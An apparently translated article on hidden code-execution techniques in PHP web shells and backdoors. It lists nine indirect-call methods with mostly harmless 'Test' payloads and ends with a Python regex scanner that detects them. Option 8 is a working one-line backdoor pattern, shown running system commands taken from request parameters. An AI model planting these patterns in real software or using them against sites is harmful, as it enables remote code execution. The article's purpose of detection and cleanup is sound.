
Implicit PHP code call techniques used in malicious scripts

While cleaning up infected sites, we come across many varieties of hacker shells and backdoors. The scripts differ in functionality and in how the source code is obfuscated, but they all share one feature: an implicit declaration of variables and functions, together with an indirect function call.

This approach is popular with authors of malicious code because, on the one hand, it greatly complicates analysis of the source and, on the other, it allows code to be stored as text data. For example, a piece of malicious code may be loaded from a third-party site, from a database, from the metadata of a jpeg/png/gif image, or passed to the script in a request. In addition, a part of the code represented as a plain text string can easily be encrypted.

Incidentally, web developers use the same techniques for legitimate purposes, in license-key checks and web application registration code, to make their products harder to crack.

Despite the diversity of malicious code, there are not many ways to declare and indirectly call a function. Below are examples of the various techniques for hidden code invocation. For simplicity and clarity, let the "malicious code" be represented by the call

 echo "Test"

which prints the word "Test" on the page. Naturally, in real shells and backdoors the names of variables and functions, as well as the executable code itself, are not stored in clear text and are in most cases obfuscated.



Option 1: indirect function call

 <?php $a = "var_dump"; $b = "Test"; $a($b); // the function name lives in a string and is called through the variable ?>


Option 2: code execution via eval

 <?php eval('$a = "Test"; echo $a;'); ?> 


Option 3: code execution via assert

 <?php assert('print("Test")'); ?>

Note: assert() evaluates a string argument as code only in PHP 7.x and earlier (deprecated since 7.2); PHP 8 no longer does this.


Option 4: code execution via array_map

 <?php function evil($a) { echo $a; } array_map('evil', array("Test")); ?> 


Option 5: code execution via preg_replace with the /e modifier

 <?php preg_replace('/.*/e', 'print("Test")', ''); ?>

Note: the /e modifier was deprecated in PHP 5.5 and removed in PHP 7.0, so this variant only works on legacy installations.


Option 6: code execution via preg_replace_callback

 <?php $a = function () { echo "Test"; }; preg_replace_callback('/.*/', $a, ''); ?> 


Option 7: code execution via usort, uasort, uksort

 <?php $a = function ($x, $y) { echo "Test"; }; $b = array(1 => '1', 2 => '2'); usort( $b, $a); ?> 


Option 8: hidden function name and parameter passed in through extract

 <?php extract($_REQUEST); $a($b); ?> 


When site.ru/script.php?a=system&b=ls is requested, the script calls system("ls").

Option 9: via registration of a shutdown function (call exit() or die() to trigger it immediately)

 <?php register_shutdown_function(create_function('', "echo 'Test';")); ?>

Note: create_function() was deprecated in PHP 7.2 and removed in PHP 8.0; on newer versions a closure is passed instead.


The same approach can be used with any call that takes a callable as an argument: call_user_func_array(), call_user_func(), forward_static_call_array(), forward_static_call(), register_tick_function(). That said, in real shells and backdoors we have not encountered calls through these functions; options 1 through 8 are what is usually used.

In real backdoors the options above are used in combination, and the declarations of the variables and functions themselves are often moved out of the script (for example, loaded from a database, from a remote server, or from image metadata).
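As an added example (not part of the original article), here is a small Python scanner that flags the indirect-call patterns from options 1 through 9 in PHP source. The rule names and sample snippets are my own constructions, and the regexes are heuristics rather than a PHP parser, so obfuscated code may evade them and a hit is a reason to inspect the file, not proof of a backdoor.

```python
from __future__ import annotations
import re

# Functions that take a callable and can therefore dispatch code hidden in data
# (options 4, 6, 7, 9 and the list at the end of the article).
CALLBACK_FUNCS = (
    "array_map", "preg_replace_callback", "usort", "uasort", "uksort",
    "register_shutdown_function", "call_user_func", "call_user_func_array",
    "forward_static_call", "forward_static_call_array", "register_tick_function",
)
# Rule names are my own labels; the regexes are heuristics, not a PHP parser.
RULES = [
    ("variable-function-call", re.compile(r"\$\w+\s*\(")),       # options 1, 8
    ("eval", re.compile(r"\beval\s*\(")),                        # option 2
    ("assert-string", re.compile(r"\bassert\s*\(\s*['\"]")),     # option 3
    ("create_function", re.compile(r"\bcreate_function\s*\(")),  # option 9
    ("extract-request",                                          # option 8
     re.compile(r"\bextract\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\b")),
    ("callback-dispatch", re.compile(r"\b(" + "|".join(CALLBACK_FUNCS) + r")\s*\(")),
]
# First string literal handed to preg_replace, so its modifiers can be inspected (option 5).
PREG_LITERAL = re.compile(r"\bpreg_replace\s*\(\s*(['\"])(.*?)\1", re.S)

def has_e_modifier(pattern_literal: str) -> bool:
    """True if a PCRE literal such as '/.*/e' carries the /e (eval) modifier."""
    if not pattern_literal:
        return False
    delim = pattern_literal[0]
    closing = {"(": ")", "[": "]", "{": "}", "<": ">"}.get(delim, delim)
    end = pattern_literal.rfind(closing)
    return end > 0 and "e" in pattern_literal[end + 1:]

def scan_php(source: str) -> list[str]:
    """Return the indirect-call techniques detected in one PHP source string."""
    found = [name for name, rx in RULES if rx.search(source)]
    if any(has_e_modifier(m.group(2)) for m in PREG_LITERAL.finditer(source)):
        found.append("preg_replace-e-modifier")
    return found

# Constructed samples mirroring some of the options above, plus a harmless script.
SAMPLES = {
    "opt1": '<?php $a = "var_dump"; $b = "Test"; $a($b); ?>',
    "opt5": "<?php preg_replace('/.*/e', 'print(\"Test\")', ''); ?>",
    "opt8": "<?php extract($_REQUEST); $a($b); ?>",
    "opt9": "<?php register_shutdown_function(create_function('', \"echo 'Test';\")); ?>",
    "clean": '<?php echo "Test"; ?>',
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(label, scan_php(src) or ["clean"])
```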

Source: https://habr.com/ru/post/215139/
